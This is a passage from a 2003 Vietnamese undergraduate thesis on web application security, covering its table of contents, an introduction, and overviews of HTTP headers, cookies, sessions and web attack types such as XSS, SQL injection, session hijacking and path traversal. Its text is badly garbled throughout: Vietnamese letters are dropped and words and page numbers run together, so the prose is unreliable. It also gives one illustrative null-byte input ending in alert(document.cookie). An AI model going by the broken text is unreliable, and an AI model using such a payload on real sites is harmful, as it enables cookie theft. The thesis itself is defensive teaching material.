LVCNTT-BaoMatWeb

8/14/2019 LVCNTT-BaoMatWeb

1/169

Khoa CNTT

B GIO DC V O TOTRNG I HC KHOA HC TNHIN TP.HCM

KHOA CNG NGH THNG TIN

B MN MNG MY TNH

LUN VN TT NGHIP

TI:

NGHIN CU MT S VN V BO MTNG DNG WEB TRN INTERNET

GVHD: Th.S. MAI VN CNGSVTH : NGUYN DUY TH NG - 9912074

NGUY N MINH THU - 9912156

KHA HC: 1999-2003


2/169

Khoa CNTT

Li cm n

Sau gn 6 thng n lc thc hin, lun vn nghin cu Cc kthut tn cng v

bo mt ng dng Web trn Internet phn no hon thnh. Ngoi s c gng

ht mnh ca bn thn, chng em nhn c s khch l rt nhiu t pha nh

trng, thy c, gia nh v bn b.

Trc ht chng con xin cm n ba m lun ng vin v to mi iu kintt chng con hc tp v hon thnh lun vn tt nghip ny.

Chng em xin cm n thy c trng i Hc Khoa Hc T Nhin truyn t

nhng kin thc qu bu cho chng em trong sut qu trnh hc tp. c bit,

chng em xin by t lng chn thnh su sc n thy Mai Vn Cng, ngi

tn tnh hng dn v gip chng em trong qu trnh lm lun vn tt nghip.

Xin cm n tt c bn b v ang ng vin, gip chng ti trong qu trnh

hc tp v hon thnh tt lun vn tt nghip ny.


3/169

Khoa CNTT

Li nhn xt


4/169

Khoa CNTT

Nghin cu mt svn vbo mtng dng Web trn Internet

MC LCGII THIU

T chc ca lun vn...PHN THNHT: C S L THUYT.

Chng 1: Gii thu ng dng Web..

I. KHI NIM NG D NG WEB..

II. M T HOT NG CA MT NG DNG WEB.....

Chng 2: Cc khi nim, thut ng lin quan ..

I. HACKER

II. HTTP HEADER...

III. SESSION.

IV. COOKIE..

V. PROXY.

Chng 3: Gii thiu slc v cc kthut tn cng ng dng Web..

I. KIM SOT TRUY CP WEB

I.1. Thm nhp h thng qua ca sau..

II. CHIM HU PHIN LM VIC...

II.1. n nh phin lm vicII.2. nh cp phin lm vic.

III. LI DNG CC THIU ST TRONG VIC KIM TRA DLIU NHP HP

L........

III.1. Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt....

III.2. Trn bm...

III.3. M ha URL..

III.4. K t Meta..

III.5. Vt qua ng dn..

III.6. Chn m lnh thc thi trn trnh duyt nn nhn..

III.7. Thm cu lnh h thng....

7

911

12

13

16

18

19

19

21

22

25

26

27

27

27

2727

27

28

28

28

28

29

29

29


5/169

Khoa CNTT


III.8. Chn cu truy vn SQL.

III.9. Ngn ng pha my ch................................................................

III.10. K t rng....

III.11. Thao tc trn tham s truyn...

IV. L THNG TIN.

V. TCHI DCH V...

PHN THHAI: CC K THUT TN CNG V BO MT NG DNG WEB..

Chng 4: Thao tc trn tham s truyn

I. THAO TC TRN URL..

I.1. Khi nim.

I.2. Mt s bin php khc phc.II. THAO TC TRN BIN N FORM.

II.1. Khi nim

II.2. Mt s bin php khc phc...

III. THAO TC TRN COOKIE

III.1. Khi nim .

III.2. Mt s bin php khc phc..

IV. THAO TC TRONG HTTP HEADER.

IV.1. Khi nim..

IV.2. Mt s bin php khc phc..

Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Side Scripting).

I. K THUT TN CNG CROSS-SITE SCRIPTING (XSS)...

II. PHNG PHP TN CNG XSS TRUYN THNG...

III. MT S WEBSITE TM THY L HNG XSS...

IV. TN CNG XSS B NG FLASH.

V. CCH PHNG CHNGChng 6: Chn cu truy vn SQL (SQL Injection).

I. KHI NIM SQL INJECTION...

II. GII THIU M HNH C S DLIU...

30

30

30

30

31

31

33

34

35

35

3636

36

38

39

39

40

41

41

42

43

44

46

50

51

5456

57

57


6/169

Khoa CNTT


III. CC CCH T N CNG.

III.1. Kthut tn cng SQL Injection...

III.2. Tn cng da vo cu lnh SELECT

III.3. Tn cng da vo cu lnh HAVING...

III.4. Tn cng da vo cu lnh kt h p UNION

III.5. Tn cng da vo lnh INSERT...

III.6. Tn cng da vo STORED PROCEDURE

III.7. Nng cao...

III.7.1. Chui k t khng c du nhy n.

III.7.2. Tn cng 2 tng

III.7.3. Trnh s kim sot...III.7.4. Dng Extended Stored Procedure

III.7.4.1. Dng Extended Stored Procedure c sn trong h thng SQL Server...

III.7.4.2. Dng Extended Stored Procedure t to.

III.7.4.3. Nhp tp tin vn bn vo bng

IV. CCH PHNG CHNG

IV.1. Kim tra d liu..

IV.2. Kho cht SQL Server (SQL Server Lockdown)...

Chng 7: Chim hu phin lm vic (Session Management)

I. TNG QUAN V SESSION ID..

II. N NH PHIN LM VIC...

II.1. Tn cng Session ID trn tham s URL

II.2. Tn cng Session ID trong bin n form...

II.3. Tn cng Session ID trong cookie.

II.4. Cch phng chng.

III. NH CP PHIN LM VIC..III.1. Tn cng kiu don phin lm vic (Prediction sessionID)

III.2. Tn cng kiu vt cn phin lm vic (Brute force ID)...

III.3. Tn cng kiu dng on m nh cp phin lm vic...

58

58

60

62

62

69

70

70

70

71

7475

75

76

77

77

78

81

83

84

85

88

89

89

91

9293

93

94


7/169

Khoa CNTT


III.4. Cch phng chng.

III.5. S khc bit gia nh cp phin lm vic (session hijacking) v n nh phin

lm vic (session fixation)...

Chng 8: Trn bm (Buffer Overflow)..

I. KHI NIM.

II. S T CHC CA B NH.

II.1. Stack...

II.2. Push v Pop

II.3. Cch lm vic ca hm..

II.4. Shell code...

III. MT S CCH GY TRN BM QUA NG DNG WEB.IV. CC CCH PHNG CHNG.

Chng 9: T chi dch v (DoS).

I. KHI NIM..

II. NHNG KH NNG B TN CNG BNG DOS.

III. CC K THUT T N CNG..

III.1. Khi nim v Tcp bt tay ba chiu

III.2. Li dng TCP thc hin phng php SYN flood truyn thng..

III.3. Tn cng vo bng thng..

III.3.1. Kiu tn cng th 1..

III.3.2. Kiu tn cng th 2..

III.4. Kiu tn cng vo ti nguyn h thng.

IV. BIN PHP PHNG CHNG.

Chng 10: Mt s kthut tn cng khc...

I. M HA URL (URL Encoding)

I.1. Khi nimI.2. Mt s bin php phng chng...

II. KIU TN CNG VT NG DN

II.1. Khi nim..

94

94

97

98

99

100

101

102

104

106106

108

109

109

110

110

112

113

113

113

117

117

119

120

120121

121

121


8/169

Khoa CNTT


II.2. Mt s bin php phng chng..

III. TN CNG DA VO K TRNG...

III.1. Khi nim..

III.2. Mt s bin php phng chng.

IV. NGN NGPHA TRNH CH.

IV.1. Khi nim..

IV.2. Cch tn cng

IV.3. Bin php phng chng

Chng 11: Tng kt qu trnh tn cng ca Hacker...

I. THU THP THNG TIN MC H TNG CA MC TIU

II. KHO ST NG D NG WEBIII. TN CNG..

Chng 12: Tng kt cc bin php phng chng...

I. VI NHNG NH QUN TR MNG

II. VI NHNG NH THIT KNG DNG WEB.

III. VI NGI SDNG NG DNG WEB...

PHN THBA: CHNG TRNH WEB CHECKER..

Chng 13: Chng trnh Web Checker..

I. C T CHNG TRNH WEB CHECKER..

I.1. Tng quan...

I.2. Yu cu...

I.2.1. Yu cu chc nng.

I.2.1. Yu cu phi chc nng...

II. KIN TRC CHNG TRNH WEB CHECKER..

II.1. Kin trc chng trnh Web Checker...

II.2. Giao tip gia chng trnh vi trnh ch Web.III. CI T...

III.1. Ngn ng ci t..

III.2. Phng php ci t.

122

123

123

123

123

123

125

125

127

128

131132

134

135

137

139

140

141

142

142

142

142

143

143

143

144145

145

145


9/169

Khoa CNTT


III.2.1. S dng m hnh giao din dng Dialog.

III.2.2. S dng ActiveX Control (Microsoft Web Browser).

III.2.3. S dng giao din lp trnh Window Socket 2

III.2.4. Mt s lp v hm chnh c ci t trong chng trnh.

III.3. M t chng trnh v cch s dng

III.3.1. Mn hnh chng trnh

III.3.2. Cch s dng...

IV. NH GI CHNG TRNH

IV.1. Nhng vn t c..

IV.2. Nhng vn hn ch

KT LUN...I. NHNG VN T C.

II. HNG PHT TRIN.

PH LC..

145

145

146

146

151

151

152

153

153

153

155156

157

158


10/169

Khoa CNTT


-Trang 7-

GII THIU

Ngy nay, khi Internet c ph bin rng ri, cc t chc, c nhn u c nhu cu

gii thiu thng tin ca mnh trn xa l thng tin cng nh thc hin cc phin giao

dch trc tuyn. Vn ny sinh l khi phm vi ng dng ca cc ng dng Web ngy

cng mrng th kh nng xut hin li v b tn cng cng cao, tr thnh i tng

cho nhiu ngi tn cng vi cc mc ch khc nhau. i khi, cng chn gin l

th ti hoc a bn vi ngi khc.

Cng vi s pht trin khng ngng ca Internet v cc dch v trn Internet, s lng

cc v tn cng trn Internet cng tng theo cp s nhn. Trong khi cc phng tin

thng tin i chng ngy cng nhc nhiu n nhng kh nng truy nhp thng tin ca

Internet, th cc ti liu chuyn mn bt u cp nhiu n vn bo m v an

ton d liu cho cc my tnh c kt ni vo mng Internet.

Theo s liu ca CERT (Computer Emegency Response Team - "i cp cu my

tnh"), s lng cc v tn cng trn Internet c thng bo cho t chc ny l t hn

200 vo nm 1989, khong 400 vo nm 1991, 1400 vo nm 1993, v 2241 vo nm

1994, v nm 2001 l 5315 v.

Nhng v tn cng ny nhm vo tt c cc my tnh c mt trn Internet, cc my tnh

ca tt c cc cng ty ln nh AT&T, IBM, cc trng i hc, cc cquan nh nc,

cc t chc qun s, nh bng... Mt s v tn cng c quy m khng l (c ti

100.000 my tnh b tn cng). Hn na, nhng con s ny ch l phn ni ca tng

bng. Mt phn rt ln cc v tn cng khng c thng bo, v nhiu l do, trong


11/169

Khoa CNTT


-Trang 8-

c th kn ni lo b mt uy tn, hoc n gin nhng ngi qun tr h thng khng

hay bit nhng cuc tn cng ang nhm vo h thng ca h.

in hnh l cuc tn cng vo phn mm thng mi ca IBM thng 3/2001, hai

hacker tm thy l hng trn ng dng m bt c ai vi mt trnh duyt Web cng

c th ly ti khon ca ngi dng, thm ch c ngi qun tr.

Khng ch s lng cc cuc tn cng tng ln nhanh chng, m cc phng php tn

cng ngy cng tinh vi v c t chc. Mt khc, vic qun tr cc h thng mng i

hi nh qun tr h thng c kin thc v kinh nghim v h thng mng chc chn,

do s yu km trong qun l s to nhiu iu kin cho cc hacker khai thc.

Cng theo CERT, nhng cuc tn cng thi k 1988-1989 ch yu l on tn ngi

s dng-mt khu (UserID/password) hoc s dng mt s li ca cc chng trnh v

hiu hnh (security hole) lm v hiu h thng bo v, tuy nhin cc cuc tn cng

vo thi gian gn y cn bao gm c cc thao tc nh gi mo a ch IP, theo di

thng tin truyn qua mng, chim cc phin lm vic t xa (telnet hoc rlogin), ci

trojan hay worm kim sot hay iu khin my tnhv th, nhu cu bo v thng

tin trn Internet l cn thit nhm mc ch bo v d liu, bo v thng tin ngi dng

v bo v h thng.

Khi ni n vn bo mt, hu ht cc chuyn gia bo mt u ch trng n s an

ton ca h thng mng v hiu hnh. bo v cho h thng, phng php thng

c chn l s dng firewall. Tuy nhin, theo tuyn b ca CSI/FBI : 78% ni b hi

c s dng firewall v 59% th b tn cng thng qua Internet, c th hn l theo bo

co ca CSI/FBI Computer Crime v Security Survey th tng s thit hi do nhng

ng dng Webb tn cng t nm 1997 n nm 2000 l 626 triu la M.


12/169

Khoa CNTT


-Trang 9-

Vi nhng cng c t ng tm l hng tuy gip rt nhiu cho nhng nh l p trnh

Web nhng vn khng th ngn chn ton b v cng ngh Web ang pht trin nhanh

chng (ch yu ch trng n yu t thm m, yu t tc ) nn dn n nhiu

khuyt im mi pht sinh. S tn cng khng nm trong khun kh vi k thut

pht hin, m linh ng v tng ln ty vo nhng sai st ca nh qun tr h thng

cng nh ca nhng ngi lp trnh ng dng.

Lun vn c thc hn vi mc ch tm hiu, phn tch cc l hng bo mt trong

cc ng dng web (cng vi chng trnh minh ha) qua xut cc phng n

sa cha. Song song , lun vn cn thc hin mt chng trnh Tng pht hin

l hng trn ng dng Web gip ch cho nhng nh l p trnh Web t kinh nghim

trnh nhng sai st trong qu trnh to cc ng dng.

Tchc ca lun vn

Lun vn gm 13 chng chia thnh 3 phn:

Phn th nht: CSL THUYT

Phn ny gm c 3 chng:

+ Chng 1 : Gii thiu vng dng Web

+ Chng 2 : Mt s khi nim, thut ng lin quan.

+ Chng 3: Slc cc kthut tn cng ng dng Web

Phn th hai:CC K THUT TN CNG V BIN PHP PHNG CHNG

Phn ny gm c 9 chng t chng 4 n chng 12 trong 7 chng u bn

lun v cc k thut tn cng, cui mi chng l bin php phng chng cho tng k

thut. Chng 11 ni v qu trnh tn cng ca hacker v n chng 12 l ni dung

cc bin php phng chng chung nht.


13/169

Khoa CNTT


-Trang 10-

Phn thba : CHNG TRNH WEB CHECKER

L gm chng cui trnh by, gii thch v chng trnh

Kt thc lun vn l phn kt lun, tm lc li nhng vn trnh by v mt s

hng pht trin trong tng lai v danh mc cc ti liu tham kho.


14/169

Khoa CNTT

Phn I: Csl thuyt

-Trang 11-

PHN THNHT

CSL THUYT


15/169

Khoa CNTT

Chng 1: Gii thiu ng dng Web

-Trang 12-

Chng 1

GII THIU NG DNG WEBNi dung:

I. Khi nim v ng dng Web

II. M t cch hot ng ca mt ng dng Web


16/169

Khoa CNTT


-Trang 13-

CHNG 1: GII THIU NG DNG WEB

Lun vn c thc hin nhm tm hiu v cc k thut tn cng trang Web v ra

cch phng chng. Do , trong chng u tin lun vn s gii thiu slc mt s

khi nim cbn v y chnh l nn tng xy dng ni dung cho nhng phn sau.

I. KHI NIM NG DNG WEB

ng dng Web l mt ng dng ch/khch s dng giao thc HTTP tng tc vi

ngi dng hay h thng khc.

Trnh khch dnh cho ngi s dng thng l mt trnh duyt Web nh Internet

Explorer hay Netscape Navigator. Cng c th l mt chng trnh ng vai tr i

l ngi dng hot ng nh mt trnh duyt tng. Ngi dng gi v nhn cc

thng tin t trnh ch thng qua vic tc ng vo cc trang Web. Cc chng trnh

c th l cc trang trao i mua bn, cc din n, gi nhn e-mail

Tc pht trin cc k thut xy dng ng dng Web cng pht trin rt nhanh.

Trc y nhng ng dng Web thng c xy dng bng CGI (Common

Gateway Interface) c chy trn cc trnh ch Web v c th kt ni vo cc cs

d liu n gin trn cng my ch. Ngy nay ng dng Web thng c vit bng

Java (hay cc ngn ng tng t) v chy trn my ch phn tn, kt ni n nhiu

ngun d liu.

Mt ng dng web thng c kin trc gm:


17/169

Khoa CNTT


-Trang 14-

Hnh 1.I-1. Kin trc mt ng dng Web

Lp trnh by: Lp ny c nhim v hin th d liu cho ngi dng, ngoi ra cn

c th c thm cc ng dng to b cc cho trang web.

Lp ng dng: l ni x l ca ng dng Web. N s x l thng tin ngi dng

yu cu, a ra quyt nh, gi kt qu n l p trnh by. L p ny thng

c ci t bng cc k thut l p trnh nh CGI, Java, .NET , PHP hay

ColdFusion, c trin khai trn cc trnh ch nh IBM WebSphere, WebLogic,

Apache, IIS

Lp d liu: thng l cc h qun tr d liu (DBMS) chu trch nhim qun l

cc file d liu v quyn s dng.

M hnh ha hot ng ca mt ng dng Web:


18/169

Khoa CNTT


-Trang 15-

Hnh 1.I-2. M hnh hot ng ca mt ng dng Web

Trong :

Trnh khch ( hay cn gi l trnh duyt): Internet Explorer, Netscap Navigator

Trnh ch: Apache, IIS, .

H qun tr csd liu: SQL Server, MySQL, DB2, Access.

Bn cnh , mt gii php dng bo v mt h thng mng thng c s dng

l bc tng la, n c vai tr nh l lp ro chn bn ngoi mt h thng mng, v

chc nng chnh ca firewall l kim sot lung thng tin gia cc my tnh. C th

xem firewall nh mt b lc thng tin, n xc nh v cho php mt my tnh ny c

c truy xut n mt my tnh khc hay khng, hay mt mng ny c c truy

xut n mng kia hay khng.

Ngi ta thng dng firewall vo mc ch:

Cho php hoc cm nhng dch v truy xut ra ngoi.


19/169

Khoa CNTT


-Trang 16-

Cho php hoc cm nhng dch v t bn ngoi truy nhp vo trong.

Kim sot a ch truy nhp, cm a ch truy nhp.

Firewall hot ng da trn gi IP do kim sot vic truy nhp ca my ngi s

dng

II.M T HOT NG CA MT NG DNG WEB

u tin trnh duyt s gi mt yu cu (request) n trnh ch Web thng qua cc

lnh cbn GET, POST ca giao thc HTTP, trnh ch lc ny c th cho thc thi

mt chng trnh c xy dng t nhiu ngn ng nh Perl, C/C++ hoc trnh

ch yu cu b din dch thc thi cc trang ASP, JSP theo yu cu ca trnh khch.

Ty theo cc tc v ca chng trnh c ci t m n x l, tnh ton, kt ni n

c s d liu, lu cc thng tin do trnh khch gi nv t tr v cho trnh

khch 1 lung d liu c nh dng theo giao thc HTTP, n gm 2 phn:

Header m t cc thng tin v gi d liu v cc thuc tnh, trng thi trao i

gia trnh duyt v WebServer.

Body l phn ni dung d liu m Server gi v Client, n c th l mt file

HTML, mt hnh nh, mt on phim hay mt vn bn bt k.

Theo m hnh hnh 1.I-2, vi firewall, lung thng tin gia trnh ch v trnh khch

l lung thng tin hp l. V th, nu hacker tm thy vi l hng trong ng dng

Web th firewall khng cn hu dng trong vic ngn chn hacker ny. Do , cc kthut tn cng vo mt h thng mng ngy nay ang dn tp trung vo nhng s

sut (hay l hng) trong qu trnh to ng dng ca nhng nh pht trin Web hn l

tn cng trc tip vo h thng mng, hiu hnh. Tuy nhin, hacker cng c th


20/169

Khoa CNTT


-Trang 17-

li dng cc l hng Web mrng s tn cng ca mnh vo cc h thng khng

lin quan khc.


21/169

Khoa CNTT

Chng 2: Cc khi nim, thut nglin quan

-Trang 18-

Chng 2

CC KHI NIM, THUT NGLIN QUAN

Ni dung:I. Hacker

II. HTTP Header

III. Phin lm vic (Session)

IV. Cookie

V. Proxy


22/169

Khoa CNTT


-Trang 19-

CHNG 2:

CC KHI NIM, THUT NGLIN QUAN

I. HACKER

Hacker l mt thut ng dng chuyn ch nhng k ph hoi cc h thng mng

Hacker thng l nhng chuyn gia v my tnh. Hacker khng to ra cc k hcho

h thng, nhng hacker li l nhng ngi am hiu v hiu hnh, h qun tr d

liu, cc ngn ng lp trnhH s dng kin thc ca mnh trong vic tm ti vkhai thc cc l hng ca h thng mng. Mt s hacker ch dng li vic pht hin

v thng bo li tm c cho nhng nh bo mt hay ngi pht trin chng trnh,

hc xem nh l WhiteHat (Hacker nn trng). Mt s hacker da vo nhng l

hng thc hin vic khai thc tri php nhm mc ch ph hoi hay mu li ring,

nhng ngi ny b xem nh l BlackHat (Hacker nn en).

V tnh cht ph bin ca thut ng hacker, nn trong phn trnh by, lun vn s sdng hacker thay cho k tn cng.

II.HTTP HEADER

HTTP header l phn u (header) ca thng tin m trnh khch v trnh ch gi cho

nhau. Nhng thng tin trnh khch gi cho trnh chc gi l HTTP requests (yu

cu) cn trnh ch gi cho trnh khch l HTTP responses (tr li). Thng thng,mt HTTP header gm nhiu dng, mi dng cha tn tham s v gi tr. Mt s


23/169

Khoa CNTT


-Trang 20-

tham s c thc dng trong c header yu cu v header tr li, cn s khc th

chuc dng ring trong tng loi. V d :

Header yu cu:

GET /tintuc/homnay.asp HTTP/1.1

Accept: */*

Accept-Language: en-us

Connection: Keep-Alive

Host: localhost

Referer: http://localhost/lienket.asp

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)

Accept-Encoding: gzip, deflate

o Dng u l dng yu cu cho bit phng thc yu cu (GET hoc

POST), a ch yu cu (/tintuc/homnay.asp) v phin bn HTTP

(HTTP/1.1)..

o Tip theo l cc tham s. Chng hn nh: Accept-Language: Cho bit ngn ng dng trong trang web.

Host: Cho bit a ch ca my ch.

Referer: Cho bit a ch ca trang web tham chiu ti.

o Header ca HTTP request s kt thc bng mt dng trng.

Header tr li:

HTTP/1.1 200 OK

Server: Microsoft-IIS/5.0

Date: Thu, 13 Jul 2000 05:46:53 GMT


24/169

Khoa CNTT


-Trang 21-

Content-Length: 2291

Content-Type: text/html

Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ;

path=/Cache-control: private

...

o Dng u l dng trng thi, cho bit phin bn HTTP c dng

(HTTP/1.1), m trng thi (200) v trng thi (OK).

o Tip theo l cc tham s.

o Tip theo l mt dng trng bo hiu kt thc header, tip theo l phn

thn ca HTTP response.

Danh sch tham s ca HTTP headerc trnh by trong ph lc A

III. SESSIONHTTP l giao thc hng i tng tng qut, phi trng thi, ngha l HTTP khng

lu tr trng thi lm vic gia trnh duyt vi trnh ch. S thiu st ny gy kh

khn cho mt s ng dng Web, bi v trnh ch khng bit c trc trnh

duyt c nhng trng thi no. V th, gii quyt vn ny, ng dng Web

a ra mt khi nim phin lm vic (Session). Cn SessionID l mt chui chng

thc phin lm vic. Mt s trnh ch s cung cp mt SessionID cho ngi dng

khi h xem trang web trn trnh ch.

duy tr phin lm vic th sessionID thng c lu vo :


25/169

Khoa CNTT


-Trang 22-

Bin trn URL

Bin n form

Cookie

Phin lm vic ch tn ti trong mt khong thi gian cho php, thi gian ny c

cu hnh qui nh ti trnh ch hoc bi ng dng thc thi. Trnh ch s tng gii

phng phin lm vic khi phc li ti nguyn ca h thng.

IV. COOKIE

Cookie l nhng phn d liu nh c cu trc c chia s gia trnh ch v trnh

duyt ca ngi dng.

Cc cookie c lu tr di nhng file d liu nh dng text, c ng dng to ra

lu tr/truy tm/nhn bit cc thng tin v ngi dng gh thm trang Web v

nhng vng m hi qua trong trang. Nhng thng tin ny c th bao gm tn/nh

danh ngi dng, mt khu, s thch, thi quen...cookie c trnh duyt ca ngi

dng chp nhn lu trn a cng ca my mnh, tuy nhin khng phi lc no trnhduyt cng h trcookie, m cn ty thuc vo ngi dng c chp nhn chuyn lu

tr hay khng.

nhng ln truy cp sau n trang Web , ng dng c th dng li nhng thng

tin trong cookie (nh thng tin lin quan n vic ng nh p vo Yahoo

Messenger!...) m ngi dng khng phi lm li thao tc ng nhp hay phi cung

cp li cc thng tin khc.

Cookie c phn lm 2 loi secure/non-secure v persistent/non-persistent do ta

s c 4 kiu cookie l:


26/169

Khoa CNTT


-Trang 23-

Persistent v Secure

Persistent v Non-Secure

Non-Persistent v Secure

Non-Persistent v Non-Secure

Persistent cookies c lu tr di dng t p tin .txt (v d trnh duyt Netscape

Navigator s lu cc cookie thnh mt tp tin cookie.txt cn Internet Explorer s lu

thnh nhiu tp tin *.txt trong mi tp tin l mt cookie) trn my khch trong mt

khon thi gian xc nh.

Non-persistent cookie th c lu tr trn b nhRAM ca my khch v s b hy

khi ng trang web hay nhn c lnh hy t trang web.

Secure cookies ch c thc gi thng qua HTTPS (SSL).

Non-Secure cookie c thc gi bng c hai giao thc HTTPS hay HTTP. Thc

cht l i vi secure cookie th trnh ch s cung cp ch truyn bo mt.

Cc thnh phn ca mt cookie gm:

Domain Flag Path Secure Expiration Name Value

www.redhat.

com

FALSE / FALSE 1154029490 Apache 64.3.40.151.16

018996349247

480

Domain: Tn min ca trang web to cookie ( trong v d trn l

www.redhat.com)


27/169

Khoa CNTT


-Trang 24-

Flag: mang gi tr TRUE/FALSE -Xc nh cc my khc vi cng tn min c

c truy xut n cookie hay khng.

Path: Phm vi cc a ch c th truy xut cookie. V d:

Nu path l /tracuu th cc a ch trong th mc /tracuu cng nh tt c cc th

mc con ca n nh /tracuu/baomat c th truy xut n cookie ny. Cn nu gi

tri l / th cookie sc truy xut bi tt ca ch thuc min trang web to

cookie.

Sercure: mang gi tr TRUE/FALSE - Xc nh y l mt secure cookie hay

khng ngha l kt ni c s dng SSL hay khng.

Expiration: thi gian ht hn ca cookie, c tnh bng giy k t 00:00:00 giGMT ngy 01/01/1970. Nu gi tr ny khng c thit l p th trnh duyt s

hiu y l non-persistent cookie v ch lu trong b nhRAM v s xo n khi

trnh duyt bng.

Name: Tn bin (trong trng hp ny l Apache)

Value: Vi cookie c to trn th gi tr ca Apache l

64.3.40.151.16018996349247480 v ngy ht hn l 27/07/2006, ca tn min

http://www.redhat.com.

V d chui lnh trong HTTP header di y s to mt cookie:

Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/";

domain="www.redhat.com"; path_spec; expires="2006-07-27

19:39:15Z"; version=0

Cc cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dn

l: C:\Program Files\Netscape\Users\UserName\Cookies.txt


28/169

Khoa CNTT


-Trang 25-

Cc cookies ca IE c lu thnh nhiu t p tin, mi t p tin l mt cookie v

c t trong [C:]\Documents and Setting\[username]\Cookies (Win2000), i

vi win9x, th mc cookies nm trong th mc [C:]\Windows\cookies.

Kch thc ti a ca cookie l 4kb. S cookie ti a cho mt tn min l 20 cookie.

Cookie b hy ngay khi ng trnh duyt gi l session cookie.

V. PROXY

Proxy cung cp cho ngi s dng truy xut Internet nhng nghi thc t bit hoc

mt t p nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng

chng trnh client ca ngi s dng s qua trung gian proxy server thay th choserver tht s m ngi s dng cn giao tip.

Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p

ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client

v tip tc chuyn ti p nhng yu cu t client n server, cng nh tr li ca

servern client. V vy proxy server ging cu ni trung gian gia server v client.


29/169

Khoa CNTT

Chng 3: Gii thiu slc vcc kthut tn cng

-Trang 26-

Chng 3

GII THIU SLC V CC K THUT TN

CNG NG DNG WEBNi dung:

I. Kim sot quyn truy cp Web

II. Chim hu phin lm vic

III. Li dng cc thiu st trong vic kim tra d li hp hp l

IV. l thng tin

V. T chi dch v


30/169

Khoa CNTT


-Trang 27-

CHNG 3: GII THIU SLC V CC K

THUT TN CNG NG DNG WEB

Sau y l cc khi nim s lc cc k thut tn cng ng dng Web c phn

loi da trn mc gy tc hi i vi ng dng.

I. KIM SOT TRUY CP WEB (Web Access Control)

I.1. Thm nhp h thng qua ca sau (Back door)

Trong qu trnh thit kng dng, nhng ngi pht trin ng dng c th ci

mt ca sau (back door) sau ny c th thm nhp vo h thng mt cch d

dng.

II.CHIM HU PHIN LM VIC(Session Mangement)

II.1. n nh phin lm vic (Session Fixation)

L kthut tn cng cho php hacker mo danh ngi dng hp l bng cch gi

mt session ID hp l n ngi dng, sau khi ngi dng ng nh p vo h

thng thnh cng, hacker s dng li session ID v nghim nhin tr thnh

ngi dng hp l.

II.2. nh cp phin lm vic (Session Hijacking)


31/169

Khoa CNTT


-Trang 28-

L k thut tn cng cho php hacker mo danh ngi dng hp l sau khi nn

nhn ng nhp vo h thng bng cch gii m session ID ca hc lu

tr trong cookie hay tham s URL, bin n ca form.

III. LI DNG CC THIU ST TRONG VIC KIM TRA

DLIU NHP HP L (Input validation)

Hacker li dng nhng nhp d liu gi i mt on m bt k khin cho h

thng phi thc thi on lnh hay b ph vhon ton.

III.1. Kim tra tnh ng n ca dliu bng ngn ngphatrnh duyt (Client-Side validation)

Do ngn ng pha trnh duyt ( JavaScript, VBScript..) uc thc thi trn trnh

duyt nn hacker c th sa i m ngun c th v hiu ha s kim tra.

III.2. Trn bm (Buffer OverFlow)

Mt khi lng d liu c gi cho ng dng vt qu lng d liu c cp

pht khin cho ng dng khng thc thi c cu lnh dnh k tip m thay

vo phi thc thi mt on m bt k do hacker a vo h thng. Nghim

trng hn nu ng dng c cu hnh thc thi vi quyn root trn h thng.

III.3. M ho URL (URL Encoding)

Li dng chun m ha nhng k t c bit trn URL m hacker s m ho t

ng nhng k tbt hp l- nhng k tb kim tra bng ngn ng kch bn-vt qua vng kim sot ny.

III.4. K t Meta (Meta-characters)


32/169

Khoa CNTT


-Trang 29-

S dng nhng k t c bit ( ni r hn trong phn ph lc) hacker c th chn

thm vo d liu gi nhng k t trong chui cu lnh nh trong kthut

XSS, -- trong SQL. thc thi cu lnh.

III.5. Vt qua ng dn (Path Traversal):

L phng php li dng ng dn truy xut mt tp tin trn URL tr kt qu

v cho trnh duyt m hacker c th ly c ni dung tp tin bt k trn h thng.

III.6. Chn m lnh thc thi trn trnh duyt nn nhn

(Cross- Site Scripting):y l k thut tn cng ch yu nhm vo thng tin trn my tnh ca ngi

dng hn l vo h thng my ch. Bng cch thm mt on m bt k ( thng

c lp trnh bng ngn ng kch bn nh JavaScript, VBScript), hacker c

th thc hin vic nh cp thng tin quan trng nh cookie t tr thnh

ngi dng hp l ca ng dngda trn nhng thng tin nh cp ny. Cross-

Site scripting cng l mt kiu tn cng session hijacking.

III.7. Thm cu lnh h thng (OS Command Injection):

Kh nng thc thi c nhng cu lnh h thng hay nhng on m c thm

vo trong nhng tham s m khng c s kim tra cht ch nh tham s ca

form, cookies, yu cu HTTP Header, v nhng d liu nguy him trong nhng

tp tin c a ln trnh ch.

Thnh cng trong kthut ny gip hacker c th thc thi c nhng cu lnh h

thng vi cng quyn ca trnh ch.


33/169

Khoa CNTT


-Trang 30-

III.8. Chn cu truy vn SQL (SQL Injection)

Trong lp trnh vi csd liu, ngi lp trnh sai st trong vn kim tra

gi tr nhp vo t hacker li dng thm vo nhng cu truy vn hay nhnggi tr khng hp l d dng ng nhp vo h thng.

III.9. Ngn ngpha my ch (Server side includes)

L kh nng thm vo nhng cu lnh thuc h thng nh nhng file (include

file), truy xut csd liu (jdbc)khin cho hacker c chi truy xut n file,

csd lium bnh thng khng th xem c trn Web site.

III.10. K trng (Null Characters)

Li dng chui k t thng kt thc bng \0 m hacker thng thm vo nh

la ng dng v vi nhng ng dng s dng chng trnh cgi nh C++ th C++

cho rng \0 l du kt thc chui.

V d:

Hacker thm chui sau:

nhp: ti th nht\0 alert(document.cookie)

nu ng dng s dng chng trnh C++ kim tra tnh ng n ca chui th

chui trn hp l do C++ s nhn bit \0 l kt thc chui nn khng kim tra

on sau..

III.11. Thao tc trn tham s truyn (Parameter

manipulation)Nhng thng tin trao i gia trnh ch v trnh duyt c lu tr trong nhng

bin nh bin trn URL, bin n form, cookieBi v vic kim sot bin cha


34/169

Khoa CNTT


-Trang 31-

c quan tm ng mc nn hacker c th li dng sa i gi tr bin nh

cp phin lm vic ca ngi dng hay thay i gi tr mt mn hng.

IV. L THNG TIN (informational)

Nhng tp tin v ng dng trn h thng cha nhng thng tin quan trng nh m

